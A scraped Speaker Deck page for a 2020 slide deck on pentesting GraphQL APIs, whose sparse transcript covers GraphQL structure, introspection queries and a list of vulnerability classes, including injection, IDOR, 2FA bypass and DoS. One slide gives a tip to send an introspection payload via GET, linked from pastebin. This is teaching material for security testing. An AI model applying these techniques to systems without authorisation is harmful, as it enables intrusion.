Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Pentesting GraphQL APIs
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Arun
July 17, 2020
Technology
210
0
Share
Pentesting GraphQL APIs
Arun
July 17, 2020
More Decks by Arun
See All by Arun
Offensive-GraphQL-API-Exploitation
hehacks
1
340
OWASP DevSlop
hehacks
0
40
Android Pentesting For Beginners - RE & Static Code Analysis
hehacks
0
120
iOS Pentesting for Beginners
hehacks
1
45
Metasploit Database Usage
hehacks
0
38
Other Decks in Technology
See All in Technology
運用システムにおけるデータ活用とPlatform
sansantech
PRO
0
140
260422_Sansan_Tech_Talk__関西_vol.3_データ活用のリアル__矢田__.pdf
sansantech
PRO
0
140
要件定義の精度を高めるための型と生成AIの活用 / Using Types and Generative AI to Improve the Accuracy of Requirements Definition
haru860
0
200
生成AI時代のドキュメントに対する期待の整理と実践から得た学び / Rethinking Documentation for LLM: Lessons from Practice
bitkey
PRO
1
120
AzureのIaC管理からログ調査まで、随所に役立つSkillsとCustom-Instructions / Boosting IaC and Log Analysis with Skills
aeonpeople
0
340
AndroidアプリとCopilot Studioの統合
nakasho
0
180
コミュニティ・勉強会を作るのは目的じゃない
ohmori_yusuke
0
280
Digital Independence: Why, When and How
wannesrams
0
150
Arcana: Production-Ready RAG in Elixir @ ElixirConf EU 2026
georgeguimaraes
0
120
Route 53 Global Resolver で高額課金発生!
otanikohei2023
0
130
Oracle AI Database@AWS:サービス概要のご紹介
oracle4engineer
PRO
4
2.4k
The 7 pitfalls of AI
ufried
0
110
Featured
See All Featured
Jamie Indigo - Trashchat’s Guide to Black Boxes: Technical SEO Tactics for LLMs
techseoconnect
PRO
0
120
A Tale of Four Properties
chriscoyier
163
24k
Designing for Timeless Needs
cassininazir
0
210
Six Lessons from altMBA
skipperchong
29
4.2k
Google's AI Overviews - The New Search
badams
0
990
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
508
140k
Breaking role norms: Why Content Design is so much more than writing copy - Taylor Woolridge
uxyall
0
270
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
35
2.4k
Game over? The fight for quality and originality in the time of robots
wayneb77
1
160
Future Trends and Review - Lecture 12 - Web Technologies (1019888BNR)
signer
PRO
0
3.5k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
133
19k
Testing 201, or: Great Expectations
jmmastey
46
8.1k
Transcript
None
None
graphql { GraphQL GraphQL Architecture REST Vs GraphQL GraphQL Schema
Introspection Query GraphQL Vulnerabilities Pentesting Tools GraphQL in Action !!! }
None
None
None
None
None
Ref: https://bit.ly/3hLZNO7
Ref: https://bit.ly/3fBQSNk
None
None
• Query – For Retrieving data/Results, similar to GET in
REST. • Mutation – For Modifications Like POST/PUT/DELETE Operations. • Subscriptions – For Events/Realtime Updates. GraphQL Schema Subscriptions (Type) - EVENTS Mutations (Type) - WRITE Query (Type) - READ
None
None
Change the POST request into GET Request. Append the payload
on the Endpoint URL from below link https://pastebin.com/QyNaXVKg https://pastebin.com/dFdsTaDQ
None
SQL Injection NoSQL Injection Access Control Related Issues. Mass Assignment
IDOR Bypassing 2FA/BruteForce Attacks. DOS Attacks etc.,
None
None
None
None
None
None
None
None
None
SiteGround - Reliable hosting with speed, security, and support you can count on.
hehacks
sansantech
haru860
bitkey
aeonpeople
nakasho
ohmori_yusuke
wannesrams
georgeguimaraes
otanikohei2023
oracle4engineer
ufried
techseoconnect
chriscoyier
cassininazir
skipperchong
badams
uxyall
marcduiker
wayneb77
signer
morganepeng
jmmastey
